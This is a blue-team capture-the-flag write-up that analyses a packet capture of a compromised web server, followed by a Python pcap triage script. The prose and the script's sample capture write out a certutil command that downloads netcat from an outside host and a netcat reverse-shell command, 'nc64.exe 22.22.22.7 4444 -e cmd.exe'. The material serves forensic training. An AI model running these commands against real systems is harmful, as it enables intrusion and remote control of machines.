HTB: Intro to Blue Team: Chase
--
Description
One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?
Attack Analysis
Filter the capture for HTTP traffic (e.g. the Wireshark display filter http) to make the session easier to follow.
The first HTTP GET requests and responses are between the attacker and the web server at 22.22.22.5.
The attacker first uploaded a webshell; requests to it carry the parameter authKey=admin.
The attacker then ran commands through the webshell and used certutil, a common living-off-the-land download technique that AV products frequently flag, to fetch netcat from 22.22.22.7:
certutil -urlcache -split -f http://22.22.22.7/nc64.exe
Netcat then runs on the web server and connects back to an attacker machine on port 4444, giving the attacker a reverse shell outside the webshell.
Over that connection the attacker ran whoami and ipconfig on the web server.
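The chain above (webshell requests with authKey=admin, the certutil download, the outbound netcat connection and the commands typed over it) can be pulled out of a capture programmatically. The following is an added example written for this page, not code from the HTB challenge or the writeup: it parses classic pcap with the standard library only (no scapy), then walks the packets once and records each stage as a finding. Everything below that is not stated in the writeup is an assumption: the webshell path /uploads/shell.aspx, the command parameter name cmd, the exact netcat command line, the allowlist of expected outbound ports, and the sample capture, which is constructed in memory.

```python
"""Added example: triage a pcap for the indicators in this writeup using only
the standard library. Assumptions (not from the page): the webshell takes its
command in a 'cmd' query parameter, the shell path and the attacker IP are
constructed, and the sample capture is built in memory below."""
import struct
from urllib.parse import parse_qs, urlsplit

WEBSERVER = "22.22.22.5"    # from the writeup
ATTACKER = "22.22.22.7"     # host that served nc64.exe in the writeup
EXPECTED_PORTS = {80, 443}  # assumed allowlist for TCP connections the web server opens


def _ip(a):
    return bytes(int(x) for x in a.split("."))


def build_packet(src, dst, sport, dport, flags, payload=b""):
    """Constructed Ethernet/IPv4/TCP frame; checksums are left zero."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     _ip(src), _ip(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    """Classic pcap container (little-endian, linktype 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


def parse_pcap(data):
    """Yield (src, dst, sport, dport, tcp_flags, payload) for each IPv4/TCP record."""
    magic = struct.unpack("<I", data[:4])[0]
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if end is None:
        raise ValueError("not a classic pcap (pcapng/nanosecond variants not handled)")
    off = 24
    while off + 16 <= len(data):
        _, _, incl, _ = struct.unpack(end + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[14 + 9] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total = struct.unpack("!H", frame[16:18])[0]
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        t = 14 + ihl
        sport, dport = struct.unpack("!HH", frame[t:t + 4])
        doff = (frame[t + 12] >> 4) * 4
        yield src, dst, sport, dport, frame[t + 13], frame[t + doff:14 + total]


def triage(data, webserver=WEBSERVER):
    """Walk the capture once and collect the attack chain as findings."""
    findings, c2 = [], set()  # c2: (peer, port) of connections the server opened itself
    for src, dst, sport, dport, flags, payload in parse_pcap(data):
        if dst == webserver and payload[:4] in (b"GET ", b"POST"):
            request_line = payload.split(b"\r\n", 1)[0].decode("latin-1")
            target = request_line.split(" ")[1]
            q = parse_qs(urlsplit(target).query)  # parse_qs already percent-decodes
            if "authKey" in q:  # the webshell's auth parameter seen in the capture
                cmd = q.get("cmd", [""])[0]  # 'cmd' is an assumed parameter name
                findings.append({"type": "webshell", "src": src,
                                 "path": urlsplit(target).path, "cmd": cmd})
                if "certutil" in cmd and "-urlcache" in cmd:
                    url = next((w for w in cmd.split() if w.startswith("http")), "")
                    findings.append({"type": "download", "url": url})
        elif src == webserver and (flags & 0x12) == 0x02:  # SYN without ACK: server dials out
            if dport not in EXPECTED_PORTS:
                c2.add((dst, dport))
                findings.append({"type": "outbound", "dst": dst, "dport": dport})
        elif dst == webserver and (src, sport) in c2 and payload:
            # data from the peer on the reverse-shell connection: commands the attacker typed
            findings.append({"type": "shell_cmd", "cmd": payload.decode("latin-1").strip()})
    return findings


# Constructed sample capture reproducing the chain described in the writeup.
SAMPLE_PCAP = build_pcap([
    build_packet(ATTACKER, WEBSERVER, 50001, 80, 0x18,
                 b"GET /uploads/shell.aspx?authKey=admin&cmd=certutil%20-urlcache%20-split%20-f"
                 b"%20http%3A%2F%2F22.22.22.7%2Fnc64.exe HTTP/1.1\r\nHost: 22.22.22.5\r\n\r\n"),
    build_packet(ATTACKER, WEBSERVER, 50002, 80, 0x18,
                 b"GET /uploads/shell.aspx?authKey=admin&cmd=nc64.exe%2022.22.22.7%204444%20-e%20cmd.exe"
                 b" HTTP/1.1\r\nHost: 22.22.22.5\r\n\r\n"),
    build_packet(WEBSERVER, ATTACKER, 49700, 4444, 0x02),  # SYN: the reverse shell connecting back
    build_packet(ATTACKER, WEBSERVER, 4444, 49700, 0x18, b"whoami\n"),
    build_packet(ATTACKER, WEBSERVER, 4444, 49700, 0x18, b"ipconfig\n"),
])

if __name__ == "__main__":
    for finding in triage(SAMPLE_PCAP):
        print(finding)
```

To run it against a real capture, pass the file contents: triage(open("capture.pcap", "rb").read()). Two caveats: the parser only understands classic pcap, so a capture saved in Wireshark's default pcapng format must be converted first (for example with editcap -F pcap), and the outbound-connection check keys on SYN-only packets from the web server, so it only catches the reverse shell if the capture includes the start of that connection rather than just the middle of it.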